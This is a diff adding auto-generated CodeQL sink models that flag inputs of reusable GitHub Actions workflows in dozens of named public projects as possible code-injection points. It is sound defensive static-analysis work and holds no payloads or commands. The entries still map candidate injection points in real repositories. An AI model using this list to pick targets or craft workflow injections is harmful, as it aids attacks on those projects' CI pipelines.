diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml new file mode 100644 index 000000000000..192b1b608438 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.release_id", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "inputs.filename", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.tar-file-name", "code-injection", "generated"] + - ["learningequality/kolibri/.github/workflows/pypi_upload.yml", "*", "inputs.whl-file-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml new file mode 100644 index 000000000000..5a397f743a3c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml new file mode 100644 index 000000000000..97f40ee7c07e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.directory", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "inputs.cargo_make_task", "code-injection", "generated"] + - ["leptos-rs/leptos/.github/workflows/get-changed-examples-matrix.yml", "*", "inputs.example_changed", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 000000000000..293939322e2b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.push_to_s3", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "inputs.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml new file mode 100644 index 000000000000..c3aa198743d5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "inputs.liquibase-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml new file mode 100644 index 000000000000..1ea78b01cd6b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["litestar-org/litestar/.github/workflows/test.yml", "*", "inputs.python-version", "code-injection", "generated"] + - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml new file mode 100644 index 000000000000..23bd3adc5a40 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.package_name_prefix", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.install", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_force_enable_stats", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.llvm_enable_assertions", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.build_shared_libs", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_build_type", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_cxx_compiler", "code-injection", "generated"] + - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "inputs.cmake_c_compiler", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml new file mode 100644 index 000000000000..77c7570ec0e5 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lnbits/lnbits/.github/workflows/make.yml", "*", "inputs.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml new file mode 100644 index 000000000000..46cc50923557 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "inputs.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml new file mode 100644 index 000000000000..78a5584d04b4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.pinned_mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.mailu_version", "code-injection", "generated"] + - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "inputs.docker_org", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml new file mode 100644 index 000000000000..1c3e5b565be8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] + - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml new file mode 100644 index 000000000000..7e8d8061fc5d --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_END", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "inputs.CTEST_START", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.xml_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/test_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.cmake_command", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.artifact_name", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.CTEST_CONFIGURATION_TYPE", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["manticoresoftware/manticoresearch/.github/workflows/build_template.yml", "*", "inputs.DISTR", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml new file mode 100644 index 000000000000..21e3fdb8874d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "inputs.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml new file mode 100644 index 000000000000..67e49a5716cb --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-mahapps-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-colors-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.mdix-version", "code-injection", "generated"] + - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "inputs.build-configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml new file mode 100644 index 000000000000..2f30003359c4 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "inputs.compilers", "code-injection", "generated"] + - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "inputs.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml new file mode 100644 index 000000000000..ed9091f37aed --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "inputs.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml new file mode 100644 index 000000000000..d940c6a98b03 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.name", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.drivername", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/mmctl-test-template.yml", "*", "inputs.datasource", "code-injection", "generated"] + - ["mattermost/mattermost/.github/workflows/esrupgrade-common.yml", "*", "inputs.db-dump-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml new file mode 100644 index 000000000000..57b56667fbe9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml new file mode 100644 index 000000000000..4ffee539cd43 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.sm_version", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_namespaces", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources_types", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.expected_resources", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.adapter_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.patternfile_name", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.service_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.deployment_url", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "inputs.provider", "code-injection", "generated"] + - ["meshery/meshery/.github/workflows/test_adapters.yaml", "*", "inputs.adapter_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml new file mode 100644 index 000000000000..bfe525b2c0e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_s3.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32_c3.yml", "*", "inputs.board", "code-injection", "generated"] + - ["meshtastic/firmware/.github/workflows/build_esp32.yml", "*", "inputs.board", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml new file mode 100644 index 000000000000..647bd0ae1939 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microcks/microcks/.github/workflows/package-native.yml", "*", "inputs.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml new file mode 100644 index 000000000000..b09fcb7f1026 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/applicationinsights-java/.github/workflows/reusable-scheduled-job-notification.yml", "*", "inputs.success", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml new file mode 100644 index 000000000000..f83101f511c6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_chat-copilot.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/chat-copilot/.github/workflows/copilot-run-integration-tests.yml", "*", "inputs.BACKEND_HOST", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-plugins.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-memorypipeline.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.DEPLOYMENT_NAME", "code-injection", "generated"] + - ["microsoft/chat-copilot/.github/workflows/copilot-deploy-backend.yml", "*", "inputs.ARTIFACT_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml new file mode 100644 index 000000000000..7a60c93516de --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_msquic.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-winkernel.yml", "*", "inputs.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.plat", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.static", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.tls", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-win.yml", "*", "inputs.config", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.sanitize", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.codecheck", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.systemcrypto", "code-injection", "generated"] + - ["microsoft/msquic/.github/workflows/build-reuse-unix.yml", "*", "inputs.plat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml new file mode 100644 index 000000000000..14d7e741dac1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_oryx.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/oryx/.github/workflows/automationTemplate.yaml", "*", "inputs.platformName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml new file mode 100644 index 000000000000..bb0e3a6a2b6b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_pr-metrics.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/pr-metrics/.github/workflows/release-phase-1-internal.yml", "*", "inputs.patch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml new file mode 100644 index 000000000000..aa8f4e6b5186 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_react-native-windows-samples.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.extraInitWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.reactNativeWindowsVersion", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-upgradesample.yml", "*", "inputs.sampleName", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.extraRunWindowsArgs", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.platform", "code-injection", "generated"] + - ["microsoft/react-native-windows-samples/.github/workflows/template-buildsample.yml", "*", "inputs.sampleName", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml new file mode 100644 index 000000000000..c9af1a40ddc2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/microsoft_vscode-cpptools.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/vscode-cpptools/.github/workflows/job-compile-and-test.yml", "*", "inputs.yarn-args", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml new file mode 100644 index 000000000000..863bc645d989 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/moby_buildkit.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.env", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.includes", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.tags", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.kinds", "code-injection", "generated"] + - ["moby/buildkit/.github/workflows/.test.yml", "*", "inputs.pkgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml new file mode 100644 index 000000000000..6e898a4e4524 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/moby_moby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.storage", "code-injection", "generated"] + - ["moby/moby/.github/workflows/.windows.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml new file mode 100644 index 000000000000..a08a96a897e8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mosaicml_composer.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.context", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.tags", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-name", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.image-uuid", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging-repo", "code-injection", "generated"] + - ["mosaicml/composer/.github/workflows/docker-configure-build-push.yaml", "*", "inputs.staging", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..f7aafb134559 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/msys2_setup-msys2.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.test", "code-injection", "generated"] + - ["msys2/setup-msys2/.github/workflows/PKGBUILD.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml new file mode 100644 index 000000000000..6107ae0e57ce --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mudler_localai.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image-aio", "code-injection", "generated"] + - ["mudler/localai/.github/workflows/image_build.yml", "*", "inputs.latest-image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml new file mode 100644 index 000000000000..74e0182cc4f6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/mustardchef_wsabuilds.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/buildarm64.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.amazonflag", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.magiskver", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.root", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.gapps", "code-injection", "generated"] + - ["mustardchef/wsabuilds/.github/workflows/build.yml", "*", "inputs.arch", "code-injection", "generated"] \ No newline at end of file 
